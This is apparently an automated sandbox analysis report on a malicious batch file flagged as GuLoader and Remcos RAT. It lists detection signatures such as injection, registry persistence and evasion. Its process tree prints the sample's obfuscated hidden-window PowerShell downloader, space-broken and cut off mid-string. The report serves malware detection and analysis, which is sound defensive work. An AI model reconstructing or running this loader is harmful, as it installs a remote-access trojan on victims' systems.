Edit tour
Windows
Analysis Report
rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Scan Loop Network
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 6936 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\rEXSP 5634HISP90 05STMSDSDO KUME74247l inierelet. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7128 cmdline:
powershell .exe -wind owstyle hi dden " <#P seudobegiv enhedens I mplume Teh sildar Ind skudsbrt b urreskrmen es #>;$Pli gtmenneske rs='Solfeg ens';<#Spl enomegalia Muoniums Plateauing Endomitos is Anisidi n Uncial # >;$Chromoi somerism=$ Pediculus+ $host.UI; function D tente($Siz ier){If ($ Chromoisom erism) {$B rugeradgan gskodernes ++;}$Trang am=$Bedigh ted34+$Siz ier.'Lengt h'-$Bruger adgangskod ernes; for ( $John=4; $John -lt $Trangam;$ John+=5){$ Tremplin=$ John;$Okku pationsmag ters+=$Siz ier[$John] ;$Nucleolo centrosome ='Sodavand er';}$Okku pationsmag ters;}func tion Trind t94($Confl uxes){ & ($Afhjeml edes) ($Co nfluxes);} $Silicomet hane=Dtent e 'striM S lioPaa,zTr aniun.tlDi rel ena No n/Sand ';$ Silicometh ane+=Dtent e 'Term5,c he.St c0 o o Temp( ek nWTh.niF y vnForad To poreitwUnw is Ann Flo pNpur TMil h far1Bill 0Cryp.smad 0C no;Lage AjoWListi H.on Ent6 Fors4 Tri; Byr. SlixS i,d6.eso4S p n; Inc R adirwillvH yp :Kalm1 Min3.ege1R esp.Dvrg0 Pas)Laes S ufG Re eB, erc aktk R ucoEphe/At ry2Af.t0 M et1stri0 e ns0 Beh1Il ed0Gips1 N on Kur,FIn .kiTyderFo reeaandfEn geoKommxAf sv/Jeop1 A nt3Stif1Sk ov.Kifs0 . nt ';$Reun ify=Dtente 'prisUArb eSGelsECry sRSelv-Se iAMarlGUn eE Yden In ltUmis ';$ Geophones= Dtente 'Cy tohMiratsa lstStr p S y s Di : F or/Font/Dn gep Mo.lca mpi A,teK bblFl,ntRe codUn.e.Bi ndtWeiroKa ntpUnpl/ta asMNatiiCo unsE.emoAl kagEartyTe rrnUnstiBy g sS amtTe .tsObno.Ov erpTemifSt ram B y '; $Ancienty= Dtente 'Ud gi> Out '; $Afhjemled es=Dtente 'LaboiCres E Na xH.nd ';$Afmarc hernes='Mi litre';$Gl endon='\Ov ertidsbeta lings.Del' ;Trindt94 (Dtente 'U dpe$ yvgAf drl SulOex trb mpaOve L ods:Esk aR yanoWed go ,oss N neTarc1Lan e1Gaas0Ans k=Lati$Sma eI denS.o rv En,:Res taBrugPPus tPAdfrD en uABetitL c iaarge+Pre $SpergMod lGuerEGeo cnBe yDung ao,rannMid t ');Trind t94 (Dtent e ' opl$Ef teGAd iLSi stoNrreBH lva OvelR, ig:UngeuRe caNUnprDFu tuEFungT n duERigeRHe r.ISte.OPa rdR Mera a taT My.iDe conInlegPa tr= Far$ M ing Grue u ldo Sn.p l okH AfvoLa g,nOverE A utSSkri.t. voSPlaiP M a.Lencoiam butPros( h an$nonraAv enNTambCAn ,sI uptEBr utn,ravt F riYWfru) P lo ');Trin dt94 (Dten te ' atr[ oneNIn,reS i itCamb.N onfsSpl eF rilrSqueVO veriCaroCe fteEsektP P ioTogsi P.tNUdvlTS kovmAcetap re nEk.ea SunGJahvEB eterSove] K,y:Scle:S rt SChareH j tCForbUA ppeRRensiD efeT SibYM atrpGarirC andoKlimT RtwOGravci stiODichlK rab Ind = Co ove [Ov erN mpae.r est Ce..la rySTince r anc Auru T hwrFluoiAd rat TakYEd ifPMediRSt upo Kont P iloSanecTr loBukslKi loTDiasyIn kvP uaE Gr a]G,os: Er i:PrettS b olEry Sdis k1Kr d2Rev , ');$Geop hones=$Und eteriorati ng[0];$Kni plens=(Dte nte 'Lset$ Skv,gForsL bilfofr sB ManAM dsL Cat: .abg Ba.ieP neS